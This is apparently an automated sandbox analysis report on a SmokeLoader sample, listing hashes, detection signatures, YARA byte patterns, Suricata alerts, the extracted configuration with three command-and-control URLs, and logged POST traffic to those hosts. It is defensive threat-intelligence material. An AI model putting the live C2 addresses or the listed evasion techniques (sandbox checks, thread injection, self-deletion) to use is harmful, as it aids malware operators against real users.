Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1532900
MD5:	29eaf4b051758c9946539b6ba8aa475f
SHA1:	7f2ce245c72d8689aaa7460cd6d12db57b9c36ba
SHA256:	8001af6bbc3cc10b1382c5efc800e479804ad1e30f0d99a57add656a811afbcd
Tags:	exeuser-Bitsight
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected SmokeLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to read the PEB

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Sigma detected: Execution of Suspicious File Type Extension

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 6444 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 29EAF4B051758C9946539B6BA8AA475F)

explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

fbtdajh (PID: 5492 cmdline: C:\Users\user\AppData\Roaming\fbtdajh MD5: 29EAF4B051758C9946539B6BA8AA475F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.2509060579.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000004.00000002.2509117152.0000000002D00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.2509117152.0000000002D00000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.2509007784.0000000002C0D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3886:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2253666122.0000000004A91000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2253666122.0000000004A91000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.2509592030.00000000047A1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.2509592030.00000000047A1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.2253380086.0000000002C1D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3086:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2253563669.0000000004790000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2253580579.00000000047A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2253580579.00000000047A0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
Process Memory Space: explorer.exe PID: 4004	ironshell_php	Semi-Auto-generated - file ironshell.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x136d29:$s2: ~ Shell I
Click to see the 8 entries

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\fbtdajh, CommandLine: C:\Users\user\AppData\Roaming\fbtdajh, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\fbtdajh, NewProcessName: C:\Users\user\AppData\Roaming\fbtdajh, OriginalFileName: C:\Users\user\AppData\Roaming\fbtdajh, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\user\AppData\Roaming\fbtdajh, ProcessId: 5492, ProcessName: fbtdajh

Suricata Signatures

ET MALWARE Suspected Smokeloader Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T06:02:41.580888+0200	2039103	1	A Network Trojan was detected	192.168.2.6	49862	125.7.253.10	80	TCP
2024-10-14T06:02:43.242369+0200	2039103	1	A Network Trojan was detected	192.168.2.6	49873	125.7.253.10	80	TCP
2024-10-14T06:02:44.741563+0200	2039103	1	A Network Trojan was detected	192.168.2.6	49884	125.7.253.10	80	TCP
2024-10-14T06:02:46.242232+0200	2039103	1	A Network Trojan was detected	192.168.2.6	49895	125.7.253.10	80	TCP
2024-10-14T06:02:47.819583+0200	2039103	1	A Network Trojan was detected	192.168.2.6	49906	125.7.253.10	80	TCP
2024-10-14T06:02:49.336141+0200	2039103	1	A Network Trojan was detected	192.168.2.6	49917	125.7.253.10	80	TCP
2024-10-14T06:02:50.858357+0200	2039103	1	A Network Trojan was detected	192.168.2.6	49928	125.7.253.10	80	TCP
2024-10-14T06:02:52.382811+0200	2039103	1	A Network Trojan was detected	192.168.2.6	49939	125.7.253.10	80	TCP
2024-10-14T06:02:53.931040+0200	2039103	1	A Network Trojan was detected	192.168.2.6	49949	125.7.253.10	80	TCP
2024-10-14T06:02:55.571568+0200	2039103	1	A Network Trojan was detected	192.168.2.6	49960	125.7.253.10	80	TCP
2024-10-14T06:02:57.199668+0200	2039103	1	A Network Trojan was detected	192.168.2.6	49972	125.7.253.10	80	TCP
2024-10-14T06:02:58.792799+0200	2039103	1	A Network Trojan was detected	192.168.2.6	49983	125.7.253.10	80	TCP
2024-10-14T06:03:00.282605+0200	2039103	1	A Network Trojan was detected	192.168.2.6	49994	125.7.253.10	80	TCP
2024-10-14T06:03:02.013801+0200	2039103	1	A Network Trojan was detected	192.168.2.6	49996	125.7.253.10	80	TCP
2024-10-14T06:03:03.632852+0200	2039103	1	A Network Trojan was detected	192.168.2.6	49997	125.7.253.10	80	TCP
2024-10-14T06:03:05.160241+0200	2039103	1	A Network Trojan was detected	192.168.2.6	49999	125.7.253.10	80	TCP
2024-10-14T06:03:06.773833+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50001	125.7.253.10	80	TCP
2024-10-14T06:03:08.494699+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50002	125.7.253.10	80	TCP
2024-10-14T06:03:10.116735+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50003	125.7.253.10	80	TCP
2024-10-14T06:03:11.620256+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50004	125.7.253.10	80	TCP
2024-10-14T06:03:13.111163+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50005	125.7.253.10	80	TCP
2024-10-14T06:03:14.871674+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50006	125.7.253.10	80	TCP
2024-10-14T06:03:16.441473+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50007	125.7.253.10	80	TCP
2024-10-14T06:03:18.047258+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50008	125.7.253.10	80	TCP
2024-10-14T06:03:19.642690+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50009	125.7.253.10	80	TCP
2024-10-14T06:03:21.149882+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50010	125.7.253.10	80	TCP
2024-10-14T06:03:22.762582+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50011	125.7.253.10	80	TCP
2024-10-14T06:03:24.252561+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50012	125.7.253.10	80	TCP
2024-10-14T06:03:25.849542+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50013	125.7.253.10	80	TCP
2024-10-14T06:03:27.421559+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50014	125.7.253.10	80	TCP
2024-10-14T06:03:29.192946+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50015	125.7.253.10	80	TCP
2024-10-14T06:03:30.817494+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50016	125.7.253.10	80	TCP
2024-10-14T06:03:32.304663+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50017	125.7.253.10	80	TCP
2024-10-14T06:03:34.246847+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50018	125.7.253.10	80	TCP
2024-10-14T06:03:36.144916+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50019	125.7.253.10	80	TCP
2024-10-14T06:04:45.418789+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50023	125.7.253.10	80	TCP
2024-10-14T06:04:51.149380+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50024	125.7.253.10	80	TCP
2024-10-14T06:04:58.244487+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50025	125.7.253.10	80	TCP
2024-10-14T06:05:04.062889+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50026	125.7.253.10	80	TCP
2024-10-14T06:05:10.088773+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50027	125.7.253.10	80	TCP
2024-10-14T06:05:18.035144+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50028	211.171.233.129	80	TCP
2024-10-14T06:05:24.004900+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50030	211.171.233.129	80	TCP
2024-10-14T06:05:31.785512+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50031	211.171.233.129	80	TCP
2024-10-14T06:05:37.620142+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50032	211.171.233.129	80	TCP
2024-10-14T06:05:43.752844+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50033	211.171.233.129	80	TCP
2024-10-14T06:05:49.451325+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50034	211.171.233.129	80	TCP
2024-10-14T06:05:55.638546+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50035	211.171.233.129	80	TCP
2024-10-14T06:06:00.592981+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50036	211.171.233.129	80	TCP
2024-10-14T06:06:06.826789+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50037	211.171.233.129	80	TCP
2024-10-14T06:06:13.270043+0200	2039103	1	A Network Trojan was detected	192.168.2.6	50038	211.171.233.129	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.2509117152.0000000002D00000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\fbtdajh

ReversingLabs: Detection: 42%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\fbtdajh

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49917 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49873 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49862 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49960 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49997 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49939 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50002 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49996 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49999 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49983 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49884 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50011 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50009 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50006 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50019 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49895 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50016 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50001 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50013 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50008 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50023 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50033 -> 211.171.233.129:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50005 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50012 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50032 -> 211.171.233.129:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50004 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50014 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50010 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50024 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50007 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50026 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50030 -> 211.171.233.129:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50003 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50015 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50034 -> 211.171.233.129:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50031 -> 211.171.233.129:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50017 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49906 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49949 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49994 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50036 -> 211.171.233.129:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49928 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50025 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50028 -> 211.171.233.129:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50027 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50018 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50035 -> 211.171.233.129:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49972 -> 125.7.253.10:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50037 -> 211.171.233.129:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:50038 -> 211.171.233.129:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 125.7.253.10 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 211.171.233.129 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://nwgrus.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://tech-servers.in.net/tmp/index.php
Source: Malware configuration extractor	URLs: http://unicea.ws/tmp/index.php

Source: Joe Sandbox View	IP Address: 211.171.233.129 211.171.233.129
Source: Joe Sandbox View	IP Address: 125.7.253.10 125.7.253.10

Source: Joe Sandbox View	ASN Name: LGDACOMLGDACOMCorporationKR LGDACOMLGDACOMCorporationKR
Source: Joe Sandbox View	ASN Name: LGDACOMLGDACOMCorporationKR LGDACOMLGDACOMCorporationKR

Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fxrdkpxlrlca.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rxkflswhfdlbttc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tagqqmqbryxkm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://plwcwjrcahoa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pucwrkwjfycmguw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tqcdafuvgwwyn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dujexgghfqd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qhntbwctbsxu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://numxyybjlxnij.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qxvvlpafyplsfmh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://agcejdimcyykepgs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sbsqbgjbfyr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kqejwgffiikyio.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://evinpfxalwnnmcek.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vsgvwtqctrqw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://aspcynlesjwhi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jkejxmgpctomkc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://doyodlaoiwpyujb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 210Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://foywayqrovd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 255Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://eekncfsmpbrkmlo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: nwgrus.ru
